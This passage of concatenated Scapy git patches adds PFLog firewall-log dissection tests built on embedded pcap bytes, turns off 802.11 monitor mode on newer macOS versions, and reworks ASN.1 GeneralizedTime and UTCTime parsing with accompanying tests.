BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00u\x00\x00\x00O*\xce_?\x1d\x05\x00\x82\x00\x00\x00\x82\x00\x00\x00d\x02\x01\x00vio0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\xff\xff\xff\xff\xff\xff\xff\xff\xa0\x86\x01\x00\x00\x00\x00\x00{\xdb\x00\x00\x01\x00\x02\x00\n\xc8\xc8\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xc8\xc8\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa9\x0b\x00\x17E\x00\x00\x1e\xdd\x1c\x00\x00@\x11\xf6\x89\n\xc8\xc8\xfe\n\xc8\xc8\x9a\xa9\x0b\x00\x17\x00\nN\x84') +pflog_udp_packets = rdpcap(pcap_pflog_udp) +# PFLog Layer +assert pflog_udp_packets[0][PFLog].hdrlen == 100 +assert pflog_udp_packets[0][PFLog].addrfamily == 2 # IPv4 +assert pflog_udp_packets[0][PFLog].action == 1 # drop +assert pflog_udp_packets[0][PFLog].saddr == '10.200.200.254' +assert pflog_udp_packets[0][PFLog].daddr == '10.200.200.154' +# IP Layer +assert pflog_udp_packets[0][IP].proto == 17 +assert pflog_udp_packets[0][IP].src == '10.200.200.254' +assert pflog_udp_packets[0][IP].dst == '10.200.200.154' +# UDP Layer +assert pflog_udp_packets[0][UDP].dport == 23 + += Dissect PFLog packet of a IP()/ICMP() echo-request dropped packet + +pcap_pflog_icmp = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00u\x00\x00\x00\x8d*\xce_\x16[\x0c\x00\xb8\x00\x00\x00\xb8\x00\x00\x00d\x02\x01\x00vio0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\xff\xff\xff\xff\xff\xff\xff\xff\xa0\x86\x01\x00\x00\x00\x00\x00\x84S\x01\x00\x01\x00\x02\x00\n\xc8\xc8\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xc8\xc8\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16K\x00\x08E\x00\x00T.\x88\x00\x00\xff\x01\xe5\xf7\n\xc8\xc8\xfe\n\xc8\xc8\x9a\x08\x00\xabD\x16K\x00\x00') +pflog_icmp_packets = rdpcap(pcap_pflog_icmp) +# PFLog Layer +assert pflog_icmp_packets[0][PFLog].hdrlen == 100 +assert pflog_icmp_packets[0][PFLog].addrfamily == 2 # IPv4 +assert pflog_icmp_packets[0][PFLog].action == 1 # drop +assert pflog_icmp_packets[0][PFLog].saddr == '10.200.200.254' +assert pflog_icmp_packets[0][PFLog].daddr == '10.200.200.154' +# IP Layer +assert pflog_icmp_packets[0][IP].proto == 1 +assert pflog_icmp_packets[0][IP].src == '10.200.200.254' +assert pflog_icmp_packets[0][IP].dst == '10.200.200.154' +# ICMP Layer +assert pflog_icmp_packets[0][ICMP].type == 8 and pflog_icmp_packets[0][ICMP].code == 0 + += Dissect PFLog packet of a IPv6()/TCP() dropped packet + +pcap_pflog_tcp_ipv6_drop = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00u\x00\x00\x00\x9dA\xce_\x98P\x08\x00\xb8\x00\x00\x00\xb8\x00\x00\x00d\x18\x01\x00vlan3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\xff\xff\xff\xff\xff\xff\xff\xff\xa0\x86\x01\x00\x00\x00\x00\x00\xd9\x08\x00\x00\x01\x00\x18\x00\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfc\x04\xe9\x00\x17`\n\xb8\x13\x00,\x06@\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfc\x04\xe9\x00\x17\xd6\xc3:\xd6\x00\x00\x00\x00\xb0\x02@\x00\xf7\xeb\x00\x00\x02\x04\x05\xa0\x01\x01\x04\x02\x01\x03\x03\x06\x01\x01\x08\nS\xd6,P\x00\x00\x00\x00') +pflog_tcp_ipv6_drop_packets = rdpcap(pcap_pflog_tcp_ipv6_drop) +# PFLog Layer +assert pflog_tcp_ipv6_drop_packets[0][PFLog].hdrlen == 100 +assert pflog_tcp_ipv6_drop_packets[0][PFLog].addrfamily == 24 # IPv6 +assert pflog_tcp_ipv6_drop_packets[0][PFLog].action == 1 +assert pflog_tcp_ipv6_drop_packets[0][PFLog].saddr == '1111:1111:1111::1' +assert pflog_tcp_ipv6_drop_packets[0][PFLog].daddr == '1111:1111:1111::fc' +# IP Layer +assert pflog_tcp_ipv6_drop_packets[0][IPv6].nh == 6 +assert pflog_tcp_ipv6_drop_packets[0][IPv6].src == '1111:1111:1111::1' +assert pflog_tcp_ipv6_drop_packets[0][IPv6].dst == '1111:1111:1111::fc' +# TCP Layer +assert pflog_tcp_ipv6_drop_packets[0][TCP].dport == 23 + += Dissect PFLog packet of a IPv6()/TCP() passed packet + +pcap_pflog_tcp_ipv6_pass = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00u\x00\x00\x00$B\xce_\x8e\xc1\x01\x00\xb8\x00\x00\x00\xb8\x00\x00\x00d\x18\x00\x00vlan3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\xff\xff\xff\xff\xff\xff\xff\xff\xa0\x86\x01\x00\x00\x00\x00\x00\xa4\x85\x00\x00\x01\x00\x18\x00\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfczw\x00\x16`\x02\x82\x85\x00,\x06@\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfczw\x00\x16\xa3\x9d\x059\x00\x00\x00\x00\xb0\x02@\x00\xd9\xf1\x00\x00\x02\x04\x05\xa0\x01\x01\x04\x02\x01\x03\x03\x06\x01\x01\x08\nu[\x1b\xfb\x00\x00\x00\x00') +pflog_tcp_ipv6_pass_packets = rdpcap(pcap_pflog_tcp_ipv6_pass) +# PFLog Layer +assert pflog_tcp_ipv6_pass_packets[0][PFLog].hdrlen == 100 +assert pflog_tcp_ipv6_pass_packets[0][PFLog].addrfamily == 24 # IPv6 +assert pflog_tcp_ipv6_pass_packets[0][PFLog].action == 0 +assert pflog_tcp_ipv6_pass_packets[0][PFLog].saddr == '1111:1111:1111::1' +assert pflog_tcp_ipv6_pass_packets[0][PFLog].daddr == '1111:1111:1111::fc' +# IP Layer +assert pflog_tcp_ipv6_pass_packets[0][IPv6].nh == 6 +assert pflog_tcp_ipv6_pass_packets[0][IPv6].src == '1111:1111:1111::1' +assert pflog_tcp_ipv6_pass_packets[0][IPv6].dst == '1111:1111:1111::fc' +# TCP Layer +assert pflog_tcp_ipv6_pass_packets[0][TCP].dport == 22 + += Dissect PFLog packet of a IPv6()/UDP() dropped packet + +pcap_pflog_udp_ipv6_drop = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00u\x00\x00\x00\xccA\xce_\xf8\x10\x03\x00\x95\x00\x00\x00\x95\x00\x00\x00d\x18\x01\x00vlan3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\xff\xff\xff\xff\xff\xff\xff\xff\xa0\x86\x01\x00\x00\x00\x00\x00\xd9\x08\x00\x00\x01\x00\x18\x00\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfc[U\x00\x16`\x0f\x1b\x84\x00\t\x11@\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfc[U\x00\x16\x00\t\xe4\xeeX') +pflog_udp_ipv6_drop_packets = rdpcap(pcap_pflog_udp_ipv6_drop) +# PFLog Layer +assert pflog_udp_ipv6_drop_packets[0][PFLog].hdrlen == 100 +assert pflog_udp_ipv6_drop_packets[0][PFLog].addrfamily == 24 # IPv6 +assert pflog_udp_ipv6_drop_packets[0][PFLog].action == 1 +assert pflog_udp_ipv6_drop_packets[0][PFLog].saddr == '1111:1111:1111::1' +assert pflog_udp_ipv6_drop_packets[0][PFLog].daddr == '1111:1111:1111::fc' +# IP Layer +assert pflog_udp_ipv6_drop_packets[0][IPv6].nh == 17 +assert pflog_udp_ipv6_drop_packets[0][IPv6].src == '1111:1111:1111::1' +assert pflog_udp_ipv6_drop_packets[0][IPv6].dst == '1111:1111:1111::fc' +# UDP Layer +assert pflog_udp_ipv6_drop_packets[0][UDP].dport == 22 + += Dissect PFLog packet of a IPv6()/ICMP6() dropped packet + +pcap_pflog_icmp6_drop = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00u\x00\x00\x005A\xce_\xa5\x06\x05\x00\xac\x00\x00\x00\xac\x00\x00\x00d\x18\x01\x00vlan3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\xff\xff\xff\xff\xff\xff\xff\xff\xa0\x86\x01\x00\x00\x00\x00\x00\x89\xa0\x00\x00\x01\x00\x18\x00\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x00\x00\xfc\x11\xed\x00\x87`\x00\x00\x00\x00 :\xff\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x00\x00\xfc\x87\x00\xf0\xf2\x00\x00\x00\x00\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfc\x01\x01RT\x00]\xcd\x9b') +pflog_icmp6_drop_packets = rdpcap(pcap_pflog_icmp6_drop) +# PFLog Layer +assert pflog_icmp6_drop_packets[0][PFLog].hdrlen == 100 +assert pflog_icmp6_drop_packets[0][PFLog].addrfamily == 24 # IPv6 +assert pflog_icmp6_drop_packets[0][PFLog].action == 1 +assert pflog_icmp6_drop_packets[0][PFLog].saddr == '1111:1111:1111::1' +assert pflog_icmp6_drop_packets[0][PFLog].daddr == 'ff02::1:ff00:fc' +# IP Layer +assert pflog_icmp6_drop_packets[0][IPv6].nh == 58 +assert pflog_icmp6_drop_packets[0][IPv6].src == '1111:1111:1111::1' +assert pflog_icmp6_drop_packets[0][IPv6].dst == 'ff02::1:ff00:fc' +# ICMP6 Layer +assert pflog_icmp6_drop_packets[0][ICMPv6ND_NS].type == 135 and pflog_icmp6_drop_packets[0][ICMPv6ND_NS].code == 0 +assert pflog_icmp6_drop_packets[0][ICMPv6ND_NS].tgt == '1111:1111:1111::fc' + += Dissect PFLog packet of a IPv6()/ICMP6() passed packet + +pcap_pflog_icmp6_pass = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00u\x00\x00\x00 B\xce_\xf4\x05\x05\x00\xac\x00\x00\x00\xac\x00\x00\x00d\x18\x00\x00vlan3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xff\xff\xff\xff\xff\xff\xff\xff\xa0\x86\x01\x00\x00\x00\x00\x00\xa4\x85\x00\x00\x01\x00\x18\x00\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfc\x11\xed\x00\x87`\x00\x00\x00\x00 :\xff\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfc\x87\x00\xbb\xc4\x00\x00\x00\x00\x11\x11\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfc\x01\x01RT\x00]\xcd\x9b') +pflog_icmp6_pass_packets = rdpcap(pcap_pflog_icmp6_pass) +# PFLog Layer +assert pflog_icmp6_pass_packets[0][PFLog].hdrlen == 100 +assert pflog_icmp6_pass_packets[0][PFLog].addrfamily == 24 # IPv6 +assert pflog_icmp6_pass_packets[0][PFLog].action == 0 +assert pflog_icmp6_pass_packets[0][PFLog].saddr == '1111:1111:1111::1' +assert pflog_icmp6_pass_packets[0][PFLog].daddr == '1111:1111:1111::fc' +# IP Layer +assert pflog_icmp6_pass_packets[0][IPv6].nh == 58 +assert pflog_icmp6_pass_packets[0][IPv6].src == '1111:1111:1111::1' +assert pflog_icmp6_pass_packets[0][IPv6].dst == '1111:1111:1111::fc' +# ICMP6 Layer +assert pflog_icmp6_pass_packets[0][ICMPv6ND_NS].type == 135 and pflog_icmp6_pass_packets[0][ICMPv6ND_NS].code == 0 +assert pflog_icmp6_pass_packets[0][ICMPv6ND_NS].tgt == '1111:1111:1111::fc' From 9da929daaae826107de3b80d33e2578be19c179f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 15 Sep 2021 15:50:47 +0200 Subject: [PATCH 0664/1632] Do not activate 802.11 monitoring on macOS Catalina and upper --- scapy/arch/bpf/supersocket.py | 26 +++++++++++++++++++++----- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index efdde88c7ca..624bd74e246 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -11,6 +11,7 @@ import platform from select import select import struct +import sys import time from scapy.arch.bpf.core import get_dev_bpf, attach_filter @@ -83,12 +84,27 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, # Note: - trick from libpcap/pcap-bpf.c - monitor_mode() # - it only works on OS X 10.5 and later if DARWIN and monitor: - dlt_radiotap = struct.pack('I', DLT_IEEE802_11_RADIO) + # Convert macOS version to an integer try: - fcntl.ioctl(self.ins, BIOCSDLT, dlt_radiotap) - except IOError: - raise Scapy_Exception("Can't set %s into monitor mode!" % - self.iface) + tmp_mac_version = platform.mac_ver()[0].split(".") + tmp_mac_version = [int(num) for num in tmp_mac_version] + macos_version = tmp_mac_version[0] * 10000 + macos_version += tmp_mac_version[1] * 100 + tmp_mac_version[2] + except (IndexError, ValueError): + warning("Could not determine your macOS version!") + macos_version = sys.maxint + + # Disable 802.11 monitoring on macOS Catalina (aka 10.15) and upper + if macos_version < 101500: + dlt_radiotap = struct.pack('I', DLT_IEEE802_11_RADIO) + try: + fcntl.ioctl(self.ins, BIOCSDLT, dlt_radiotap) + except IOError: + raise Scapy_Exception("Can't set %s into monitor mode!" % + self.iface) + else: + warning("Scapy won't activate 802.11 monitoring, " + "as it will crash your macOS kernel!") # Don't block on read try: From 3783f1b016263bf7ceff8dd967af97849bc2bf4e Mon Sep 17 00:00:00 2001 From: Peter Eisenlohr Date: Fri, 23 Apr 2021 15:10:27 +0200 Subject: [PATCH 0665/1632] improved ASN1_{GENERALIZED,UTC}_TIME implementations --- scapy/asn1/asn1.py | 151 +++++++++++++++++++++++++++++++------ scapy/layers/tls/cert.py | 16 +--- test/cert.uts | 6 +- test/scapy/layers/asn1.uts | 103 +++++++++++++++++++++++++ 4 files changed, 240 insertions(+), 36 deletions(-) create mode 100644 test/scapy/layers/asn1.uts diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index f7ffb72e05c..672abfff805 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -12,7 +12,7 @@ from __future__ import print_function import random -from datetime import datetime +from datetime import datetime, timedelta, tzinfo from scapy.config import conf from scapy.error import Scapy_Exception, warning from scapy.volatile import RandField, RandIP, GeneralizedTime @@ -40,6 +40,36 @@ if TYPE_CHECKING: from scapy.asn1.ber import BERcodec_Object +try: + from datetime import timezone +except ImportError: + # Python 2 compat - don't bother typing it + class UTC(tzinfo): + """UTC""" + def utcoffset(self, dt): # type: ignore + return timedelta(0) + + def tzname(self, dt): # type: ignore + return "UTC" + + def dst(self, dt): # type: ignore + return None + + class timezone(tzinfo): # type: ignore + def __init__(self, delta): # type: ignore + self.delta = delta + + def utcoffset(self, dt): # type: ignore + return self.delta + + def tzname(self, dt): # type: ignore + return None + + def dst(self, dt): # type: ignore + return None + + timezone.utc = UTC() # type: ignore + class RandASN1Object(RandField): def __init__(self, objlist=None): @@ -420,7 +450,7 @@ def __init__(self, val, readable=False): self.val_readable = cast(bytes, val) # type: ignore def __setattr__(self, name, value): - # type: (str, str) -> None + # type: (str, Any) -> None if name == "val_readable": if isinstance(value, (str, bytes)): val = "".join(binrepr(orb(x)).zfill(8) for x in value) @@ -529,45 +559,124 @@ class ASN1_IA5_STRING(ASN1_STRING): tag = ASN1_Class_UNIVERSAL.IA5_STRING -class ASN1_UTC_TIME(ASN1_STRING): - tag = ASN1_Class_UNIVERSAL.UTC_TIME +class ASN1_GENERALIZED_TIME(ASN1_STRING): + """ + Improved version of ASN1_GENERALIZED_TIME, properly handling time zones and + all string representation formats defined by ASN.1. These are: + + 1. Local time only: YYYYMMDDHH[MM[SS[.fff]]] + 2. Universal time (UTC time) only: YYYYMMDDHH[MM[SS[.fff]]]Z + 3. Difference between local and UTC times: YYYYMMDDHH[MM[SS[.fff]]]+-HHMM + + It also handles ASN1_UTC_TIME, which allows: + + 1. Universal time (UTC time) only: YYMMDDHHMM[SS[.fff]]Z + 2. Difference between local and UTC times: YYMMDDHHMM[SS[.fff]]+-HHMM + + Note the differences: Year is only two digits, minutes are not optional and + there is no milliseconds. + """ + tag = ASN1_Class_UNIVERSAL.GENERALIZED_TIME + pretty_time = None + + def __init__(self, val): + # type: (Union[str, datetime]) -> None + if isinstance(val, datetime): + self.__setattr__("datetime", val) + else: + super(ASN1_GENERALIZED_TIME, self).__init__(val) def __setattr__(self, name, value): - # type: (str, str) -> None + # type: (str, Any) -> None if isinstance(value, bytes): value = plain_str(value) + if name == "val": + formats = { + 10: "%Y%m%d%H", + 12: "%Y%m%d%H%M", + 14: "%Y%m%d%H%M%S" + } + dt = None # type: Optional[datetime] + try: + if value[-1] == "Z": + str, ofs = value[:-1], value[-1:] + elif value[-5] in ("+", "-"): + str, ofs = value[:-5], value[-5:] + elif isinstance(self, ASN1_UTC_TIME): + raise ValueError() + else: + str, ofs = value, "" + + if isinstance(self, ASN1_UTC_TIME) and len(str) >= 10: + fmt = "%y" + formats[len(str) + 2][2:] + elif str[-4] == ".": + fmt = formats[len(str) - 4] + ".%f" + else: + fmt = formats[len(str)] + + dt = datetime.strptime(str, fmt) + if ofs == 'Z': + dt = dt.replace(tzinfo=timezone.utc) + elif ofs: + sign = -1 if ofs[0] == "-" else 1 + ofs = datetime.strptime(ofs[1:], "%H%M") + delta = timedelta(hours=ofs.hour * sign, + minutes=ofs.minute * sign) + dt = dt.replace(tzinfo=timezone(delta)) + except Exception: + dt = None + pretty_time = None - if isinstance(self, ASN1_GENERALIZED_TIME): - _len = 15 - self._format = "%Y%m%d%H%M%S" - else: - _len = 13 - self._format = "%y%m%d%H%M%S" - _nam = self.tag._asn1_obj.__name__[4:].lower() - if (isinstance(value, str) and - len(value) == _len and value[-1] == "Z"): - dt = datetime.strptime(value[:-1], self._format) - pretty_time = dt.strftime("%b %d %H:%M:%S %Y GMT") - else: + if dt is None: + _nam = self.tag._asn1_obj.__name__[5:] + _nam = _nam.lower().replace("_", " ") pretty_time = "%s [invalid %s]" % (value, _nam) + else: + pretty_time = dt.strftime("%Y-%m-%d %H:%M:%S") + if dt.microsecond: + pretty_time += dt.strftime(".%f")[:4] + if dt.tzinfo == timezone.utc: + pretty_time += dt.strftime(" UTC") + elif dt.tzinfo is not None: + if dt.tzinfo.utcoffset(dt) is not None: + pretty_time += dt.strftime(" %z") + ASN1_STRING.__setattr__(self, "pretty_time", pretty_time) + ASN1_STRING.__setattr__(self, "datetime", dt) ASN1_STRING.__setattr__(self, name, value) elif name == "pretty_time": print("Invalid operation: pretty_time rewriting is not supported.") + elif name == "datetime": + ASN1_STRING.__setattr__(self, name, value) + if isinstance(value, datetime): + yfmt = "%y" if isinstance(self, ASN1_UTC_TIME) else "%Y" + if value.microsecond: + str = value.strftime(yfmt + "%m%d%H%M%S.%f")[:-3] + else: + str = value.strftime(yfmt + "%m%d%H%M%S") + + if value.tzinfo == timezone.utc: + str = str + "Z" + else: + str = str + value.strftime("%z") # empty if naive + + ASN1_STRING.__setattr__(self, "val", str) + else: + ASN1_STRING.__setattr__(self, "val", None) else: ASN1_STRING.__setattr__(self, name, value) def __repr__(self): # type: () -> str return "%s %s" % ( - self.pretty_time, # type: ignore - super(ASN1_UTC_TIME, self).__repr__() + self.pretty_time, + super(ASN1_GENERALIZED_TIME, self).__repr__() ) -class ASN1_GENERALIZED_TIME(ASN1_UTC_TIME): - tag = ASN1_Class_UNIVERSAL.GENERALIZED_TIME +class ASN1_UTC_TIME(ASN1_GENERALIZED_TIME): + tag = ASN1_Class_UNIVERSAL.UTC_TIME class ASN1_ISO646_STRING(ASN1_STRING): diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index b6eb0af2bd6..1ead6817b3a 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -599,24 +599,16 @@ def import_from_asn1pkt(self, cert): self.authorityKeyID = None self.notBefore_str = tbsCert.validity.not_before.pretty_time - notBefore = tbsCert.validity.not_before.val - if notBefore[-1] == "Z": - notBefore = notBefore[:-1] try: - _format = tbsCert.validity.not_before._format - self.notBefore = time.strptime(notBefore, _format) - except Exception: + self.notBefore = tbsCert.validity.not_before.datetime.timetuple() + except ValueError: raise Exception(error_msg) self.notBefore_str_simple = time.strftime("%x", self.notBefore) self.notAfter_str = tbsCert.validity.not_after.pretty_time - notAfter = tbsCert.validity.not_after.val - if notAfter[-1] == "Z": - notAfter = notAfter[:-1] try: - _format = tbsCert.validity.not_after._format - self.notAfter = time.strptime(notAfter, _format) - except Exception: + self.notAfter = tbsCert.validity.not_after.datetime.timetuple() + except ValueError: raise Exception(error_msg) self.notAfter_str_simple = time.strftime("%x", self.notAfter) diff --git a/test/cert.uts b/test/cert.uts index bdc8b5008ab..4a89661aa98 100644 --- a/test/cert.uts +++ b/test/cert.uts @@ -377,7 +377,7 @@ awaited = """ Serial: 15459312981008553731928384953135426796 Issuer: /C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert Assured ID Root G3 Subject: /C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert Assured ID Root G3 -Validity: Aug 01 12:00:00 2013 GMT to Jan 15 12:00:00 2038 GMT +Validity: 2013-08-01 12:00:00 UTC to 2038-01-15 12:00:00 UTC """ with ContextManagerCaptureOutput() as cmco: @@ -452,8 +452,8 @@ awaited = """ Version: 1 sigAlg: sha1-with-rsa-signature Issuer: /C=US/O=VeriSign, Inc./OU=Class 1 Public Primary Certification Authority -lastUpdate: Nov 02 00:00:00 2006 GMT -nextUpdate: Feb 17 23:59:59 2007 GMT +lastUpdate: 2006-11-02 00:00:00 UTC +nextUpdate: 2007-02-17 23:59:59 UTC """ with ContextManagerCaptureOutput() as cmco: diff --git a/test/scapy/layers/asn1.uts b/test/scapy/layers/asn1.uts new file mode 100644 index 00000000000..3ead0b8b40b --- /dev/null +++ b/test/scapy/layers/asn1.uts @@ -0,0 +1,103 @@ +% Tests for generic ASN.1 encoding + +# +# Try me with: +# bash test/run_tests -t test/scapy/layers/asn1.uts -F + +########### ASN.1 border case ####################################### + ++ ASN.1 Generalized Time += short HH +repr(ASN1_GENERALIZED_TIME("1999123123")).startswith("1999-12-31 23:00:00 <") += short HH (invalid) +"invalid" in repr(ASN1_GENERALIZED_TIME("1999123124")) += short HHMM +repr(ASN1_GENERALIZED_TIME("199912312359")).startswith("1999-12-31 23:59:00 <") += short HHMM (invalid) +"invalid" in repr(ASN1_GENERALIZED_TIME("199912312360")) += full +repr(ASN1_GENERALIZED_TIME("19991231235959")).startswith("1999-12-31 23:59:59 <") += full (invalid) +"invalid" in repr(ASN1_GENERALIZED_TIME("19991231235960")) += with microseconds +repr(ASN1_GENERALIZED_TIME("19991231235959.999")).startswith("1999-12-31 23:59:59.999 <") += with microseconds (invalid) +assert("invalid" in repr(ASN1_GENERALIZED_TIME("1999123125959.99"))) +assert("invalid" in repr(ASN1_GENERALIZED_TIME("1999123125959.99x"))) +assert("invalid" in repr(ASN1_GENERALIZED_TIME("1999123125959.9999"))) + + ++ ASN.1 Generalized Time (Zulu) += Z short HH +repr(ASN1_GENERALIZED_TIME("1999123123Z")).startswith("1999-12-31 23:00:00 UTC <") += Z short HHMM +repr(ASN1_GENERALIZED_TIME("199912312359Z")).startswith("1999-12-31 23:59:00 UTC <") += Z full +repr(ASN1_GENERALIZED_TIME("19991231235959Z")).startswith("1999-12-31 23:59:59 UTC <") += Z with microseconds +repr(ASN1_GENERALIZED_TIME("19991231235959.999Z")).startswith("1999-12-31 23:59:59.999 UTC <") + + ++ ASN.1 Generalized Time (Timezone Offset) += offset short HH +ASN1_GENERALIZED_TIME("1999123123+0100") +repr(ASN1_GENERALIZED_TIME("1999123123+0100")).startswith("1999-12-31 23:00:00 +0100 <") += offset short HHMM +repr(ASN1_GENERALIZED_TIME("199912312359+0100")).startswith("1999-12-31 23:59:00 +0100 <") += offset full +repr(ASN1_GENERALIZED_TIME("19991231235959+0100")).startswith("1999-12-31 23:59:59 +0100 <") += offset with microseconds +repr(ASN1_GENERALIZED_TIME("19991231235959.999+0100")).startswith("1999-12-31 23:59:59.999 +0100 <") += offset negative +repr(ASN1_GENERALIZED_TIME("19991231235959-2359")).startswith("1999-12-31 23:59:59 -2359 <") += offset invalid (offset >= 24h) +assert("invalid" in repr(ASN1_GENERALIZED_TIME("19991231235959-2400"))) +assert("invalid" in repr(ASN1_GENERALIZED_TIME("19991231235959+2400"))) + + ++ ASN.1 UTC Time += UTC short HHMM +repr(ASN1_UTC_TIME("9912312359Z")).startswith("1999-12-31 23:59:00 UTC <") += UTC short HHMM (no Z) +"invalid" in repr(ASN1_UTC_TIME("9912312359")) += UTC short HHMM (invalid) +"invalid" in repr(ASN1_UTC_TIME("99123160")) += UTC full +repr(ASN1_UTC_TIME("991231235959Z")).startswith("1999-12-31 23:59:59 UTC <") += UTC full (no Z) +"invalid" in repr(ASN1_UTC_TIME("991231235959")) += UTC full (invalid) +"invalid" in repr(ASN1_UTC_TIME("9912315960")) + ++ ASN.1 Generalized Time (datetime member) += prepare +class TZ(tzinfo): + def __init__(self, delta): self.delta = delta + def utcoffset(self, dt): return self.delta + def dst(self, dt): return None += short HH datetime +ASN1_GENERALIZED_TIME("1999123123").datetime == datetime(1999, 12, 31, 23) += short HHMM datetime +ASN1_GENERALIZED_TIME("199912312359").datetime == datetime(1999, 12, 31, 23, 59) += full datetime +ASN1_GENERALIZED_TIME("19991231235959").datetime == datetime(1999, 12, 31, 23, 59, 59) += datetime assignment +x = ASN1_GENERALIZED_TIME("19991231235959.999") +x.datetime = datetime(2020, 12, 31) +assert(x.val == "20201231000000") +x.datetime = x.datetime.replace(tzinfo=timezone.utc) +x.val == "20201231000000Z" += datetime construction +ASN1_GENERALIZED_TIME(datetime(2020, 12, 31)).val == "20201231000000" += datetime construction (UTC) +ASN1_GENERALIZED_TIME(datetime(2020, 12, 31, tzinfo=timezone.utc)).val == "20201231000000Z" += datetime construction (offset) +ASN1_GENERALIZED_TIME(datetime(2020, 12, 31, tzinfo=timezone(timedelta(hours=-23, minutes=-59)))).val == "20201231000000-2359" + ++ ASN.1 UTC Time (datetime member) += UTC datetime construction +ASN1_UTC_TIME(datetime(2020, 12, 31)).val == "201231000000" += UTC datetime construction (Z) +ASN1_UTC_TIME(datetime(2020, 12, 31, tzinfo=timezone.utc)).val == "201231000000Z" += UTC datetime construction (offset) +ASN1_UTC_TIME(datetime(2020, 12, 31, tzinfo=timezone(timedelta(hours=-23, minutes=-59)))).val == "201231000000-2359" From dffc326abd27d1d03a781ae3176404433cf28e65 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: 